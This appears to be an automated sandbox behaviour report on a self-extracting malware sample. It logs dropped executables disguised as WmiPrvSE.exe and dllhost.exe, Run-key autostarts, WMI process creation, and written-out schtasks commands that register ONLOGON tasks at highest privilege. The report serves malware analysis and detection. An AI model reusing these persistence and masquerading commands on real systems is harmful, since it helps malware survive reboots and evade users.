Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\schannel\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"
Source: unknown	Process created: C:\Windows\System32\ddraw\dllhost.exe C:\Windows\System32\ddraw\dllhost.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
Source: unknown	Process created: C:\Windows\System32\ddraw\dllhost.exe "C:\Windows\System32\ddraw\dllhost.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: PMDfwr7Jal.exe

Static file information: File size 2294457 > 1048576

Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PMDfwr7Jal.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PMDfwr7Jal.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: PMDfwr7Jal.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PMDfwr7Jal.exe

Source: PMDfwr7Jal.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PMDfwr7Jal.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PMDfwr7Jal.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PMDfwr7Jal.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PMDfwr7Jal.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\__tmp_rar_sfx_access_check_5412125

Jump to behavior

Source: PMDfwr7Jal.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072E28C push eax; ret	0_2_0072E2AA
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072CAB5 push eax; retf 0072h	0_2_0072CACE
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072ED46 push ecx; ret	0_2_0072ED59
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Code function: 4_2_00007FFD9BA900BD pushad ; iretd	4_2_00007FFD9BA900C1
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Code function: 12_2_00007FFD9BAA00BD pushad ; iretd	12_2_00007FFD9BAA00C1
Source: C:\Windows\System32\ddraw\dllhost.exe	Code function: 13_2_00007FFD9BAD00BD pushad ; iretd	13_2_00007FFD9BAD00C1
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Code function: 15_2_00007FFD9BAC00BD pushad ; iretd	15_2_00007FFD9BAC00C1
Source: C:\Windows\System32\ddraw\dllhost.exe	Code function: 17_2_00007FFD9BAD00BD pushad ; iretd	17_2_00007FFD9BAD00C1
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Code function: 18_2_00007FFD9BAE67CE push ecx; retf	18_2_00007FFD9BAE685C
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Code function: 18_2_00007FFD9BAD00BD pushad ; iretd	18_2_00007FFD9BAD00C1

Source: perfCrtmonitorsvcMonitorDll.exe.0.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: ZyNSmFTtlPIEeiJBfofO.exe.4.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: ZyNSmFTtlPIEeiJBfofO.exe0.4.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: ZyNSmFTtlPIEeiJBfofO.exe1.4.dr	Static PE information: section name: .text entropy: 7.402788970663933
Source: dllhost.exe.4.dr	Static PE information: section name: .text entropy: 7.402788970663933

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File written: C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Executable created and started: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe			Jump to behavior
Source: unknown	Executable created and started: C:\Windows\System32\ddraw\dllhost.exe

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\ddraw\dllhost.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\ddraw\dllhost.exe			Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZyNSmFTtlPIEeiJBfofO	Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
